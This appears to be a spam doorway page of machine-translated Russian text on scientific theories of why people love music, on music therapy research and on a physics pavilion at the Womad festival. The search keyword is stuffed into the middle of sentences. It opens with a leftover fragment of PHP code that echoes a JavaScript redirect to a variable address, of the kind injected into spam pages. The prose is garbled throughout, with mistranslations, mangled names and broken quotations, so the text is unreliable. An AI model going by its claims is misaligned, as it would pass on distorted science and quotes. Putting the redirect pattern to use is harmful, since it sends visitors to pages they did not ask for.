window.location = \"$z_out\";";} ?>

Ученые о музыке

Теория о том, почему мы любим музыку

В конце 1990-х годов, наш собственный Стивен Линкер взъерошенные перья в когнитивной психологии сообщества после того, как он назвал музыку «слуховое чизкейк.» Он был ссылаясь на теорию, что музыка является бесполезным побочным продуктом естественного отбора — потенциально расточительное использование ресурсов нашего мозга, которая приносит удовольствие, но не служит эволюционной цели для данного вида. С эволюционной точки зрения, ученые уже давно пытаются определить объяснение количества времени и энергии мы тратим на музыку.


Как мы раскатать наш профиль музыкального значка и инженер Том Скис, мы собрали некоторые из наиболее убедительных теорий, используемых для ответа на вопрос — почему мы любим музыку? 1. Получить Девушка darwinChicks рыть музыку. «Что приносит никому в любом месте? Почему мужчины строят мосты, почему там струи? Я надеялся, что заниматься сексом Ученые о музыкесегодня вечером.»Это понимание приходит с блеском деформированного ума Джек Дунай, персонаж на канал NBC 30 Рок. Теория Дарвина полового отбора основывается на подобной идеологии. По той же причине, что мужчины мускулов или душ или даже вставать утром, они играют музыку, чтобы получить девочка. Дарвин сказал: «Первобытный человек, вероятно, первым использовал свой голос в производстве истинных музыкальные интонаций, как это делают некоторые из обезьян на сегодняшний день; и мы можем сделать вывод … что эта сила была бы особенно оказываемое во время ухаживания полов.»Исследователи, которые поддерживают эту теорию часто указывают на этнографических данных. Например, антрополог Бронислав Малиновский заметил известный певец среди туземцев в Troibriand островов у восточного побережья Новой Гвинеи. «, Как и все его профессии он был не менее известный за его успех с дамами, » сказал Малиновский. «Горло длинный проход, как wilu (вульвы), а также два притягиваются друг к другу.» Alrighty тогда. Хотя это интересно в теории, это не объясняет успех Леди Гага или Джони Митчел, или любого другого женского музыканта.

Что необходимо сделать на длинном пути к музыкальной терапии?

Прежде всего, требуется адекватная стратегия исследования. Для этой цели общей методология Ученые о музыкеисследования терапии должна быть принята. Кроме того, музыкальная терапия нуждается в различных методах смежных областях, чтобы способствовать результаты научных исследований, в том числе математики, естественных наук, поведенческих и социальных наук, а также искусства. Плюрализм кажется необходимым, а также неизбежно. По крайней мере, две основные задачи исследования могут быть идентифицированы, однако, что делает путь каменистые: проблемы специфичности и проблемы эклектики. Неврологическое исследование в области музыки порождает новые идеи, перспективы и методы; они, как представляются, многообещающие перспективы для возможного вклада в теоретическую и эмпирическую научную основу для музыкальной терапии. Несмотря на огромной разнородность теоретических подходов в музыкальной терапии, интегративная модель работы компонентов в музыкальной терапии является полезной в качестве отправной точки для эмпирических исследований для того, чтобы вопрос, что конкретно работает в музыкальной терапии. Для этой цели, эвристической модели, состоящей из пяти рабочих факторов музыки терапии (внимание модуляции, эмоции модуляции, познанием модуляции, модуляции поведения и модуляции связи) был разработан Центром музыкальной терапии исследований (Виктор Дилер институт) в Гейдельберге. Опыт показывает эффективность музыкальной терапии для лечения некоторых заболеваний, но вопрос о том, что он находится в музыкальной терапии, которая работает во многом остается без ответа. Авторы пришли к заключению с некоторыми вопросами к неврологам, которые, мы надеемся, может помочь прояснить важные аспекты возможной связи между этими двумя дисциплинами.

Ученые о музыкеПреодоление разрыв между наукой и музыкой

«Существует определенно наука для проведения фестиваля искусств», — говорит научный докладчик, комик и само описанная певица Хелен Арни.
Она говорит за кулисами в Павильоне физики, последнем дополнении к Всемирному музыкальному фестивалю Womad, где появляются такие артисты, как певец Джордж Клинтон и плейер Анушка Шалкар.
«В динамике толпы есть какая-то действительно интересная физика. Убедившись, что люди могут перейти от одного этапа к другому за минимальное время», — говорит она.